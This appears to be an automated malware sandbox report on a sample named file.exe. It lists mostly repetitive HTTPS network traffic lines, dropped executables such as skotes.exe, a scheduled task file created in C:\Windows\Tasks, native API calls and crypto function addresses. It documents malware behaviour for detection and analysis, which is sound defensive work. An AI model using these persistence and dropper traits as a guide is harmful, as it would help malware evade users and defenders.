Source: unknown	Network traffic detected: HTTP traffic on port 54609 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 54643 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 54538 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54515 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54599 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 54736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 54560 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 54665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 54504 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 54536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54559 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54513 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54639 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54571 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54703
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54708
Source: unknown	Network traffic detected: HTTP traffic on port 54663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54707
Source: unknown	Network traffic detected: HTTP traffic on port 54720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54700
Source: unknown	Network traffic detected: HTTP traffic on port 54548 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54710
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54547 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54604 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54607
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 54701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54604
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 54514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54609
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54608
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54729
Source: unknown	Network traffic detected: HTTP traffic on port 54686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54603
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54602
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54723
Source: unknown	Network traffic detected: HTTP traffic on port 54743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54601
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54721
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54525 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54590 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54629 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54581 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54650 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54523 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54569 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54640 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54535 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54617 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54580 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54539
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54659
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54533
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54532
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54653
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54774
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54531
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54537
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54779
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54657
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54535
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54656
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54534
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54655
Source: unknown	Network traffic detected: HTTP traffic on port 54740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54776
Source: unknown	Network traffic detected: HTTP traffic on port 54763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54540
Source: unknown	Network traffic detected: HTTP traffic on port 54545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54661
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54781
Source: unknown	Network traffic detected: HTTP traffic on port 54522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54780
Source: unknown	Network traffic detected: HTTP traffic on port 54625 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54568 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54549
Source: unknown	Network traffic detected: HTTP traffic on port 54533 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54665
Source: unknown	Network traffic detected: HTTP traffic on port 54636 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54542
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54663
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54541
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54662
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54548
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54547
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54668
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54667
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54545
Source: unknown	Network traffic detected: HTTP traffic on port 54579 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54666
Source: unknown	Network traffic detected: HTTP traffic on port 54739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54550
Source: unknown	Network traffic detected: HTTP traffic on port 54660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54670
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54511 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54675
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54559
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54558
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54678
Source: unknown	Network traffic detected: HTTP traffic on port 54704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54562
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54561
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54560
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54680
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54613 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54563
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54569
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54568
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54690
Source: unknown	Network traffic detected: HTTP traffic on port 54683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54572
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54571
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54691
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54618
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54617
Source: unknown	Network traffic detected: HTTP traffic on port 54693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54616
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54615
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54736
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54610
Source: unknown	Network traffic detected: HTTP traffic on port 54649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54730
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54614
Source: unknown	Network traffic detected: HTTP traffic on port 54729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54613
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54612
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54611
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54732
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54508
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54629
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54507
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54628
Source: unknown	Network traffic detected: HTTP traffic on port 54703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54749
Source: unknown	Network traffic detected: HTTP traffic on port 54776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54506
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54505
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54626
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54621
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54740
Source: unknown	Network traffic detected: HTTP traffic on port 54615 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54625
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54503
Source: unknown	Network traffic detected: HTTP traffic on port 54593 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54623
Source: unknown	Network traffic detected: HTTP traffic on port 54741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54744
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54622
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54743
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54626 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54519
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54518
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54639
Source: unknown	Network traffic detected: HTTP traffic on port 54775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54517
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54637
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54511
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54632
Source: unknown	Network traffic detected: HTTP traffic on port 54637 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54510
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54631
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54630
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54751
Source: unknown	Network traffic detected: HTTP traffic on port 54614 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54515
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54636
Source: unknown	Network traffic detected: HTTP traffic on port 54742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54514
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54635
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54513
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54634
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54755
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54512
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54633
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54754
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54760
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54649
Source: unknown	Network traffic detected: HTTP traffic on port 54753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54527
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54769

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49806 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name:
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name: .idata

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6AB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6AB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6AB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C64F280
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0017CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	23_2_0017CB97

Creates files inside the system directory

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

File created: C:\Windows\Tasks\skotes.job

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6435A0	0_2_6C6435A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655440	0_2_6C655440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B545C	0_2_6C6B545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B542B	0_2_6C6B542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BAC00	0_2_6C6BAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685C10	0_2_6C685C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692C10	0_2_6C692C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64D4E0	0_2_6C64D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686CF0	0_2_6C686CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6564C0	0_2_6C6564C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D4D0	0_2_6C66D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A34A0	0_2_6C6A34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AC4A0	0_2_6C6AC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656C80	0_2_6C656C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65FD00	0_2_6C65FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670512	0_2_6C670512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66ED10	0_2_6C66ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A85F0	0_2_6C6A85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680DD0	0_2_6C680DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B6E63	0_2_6C6B6E63
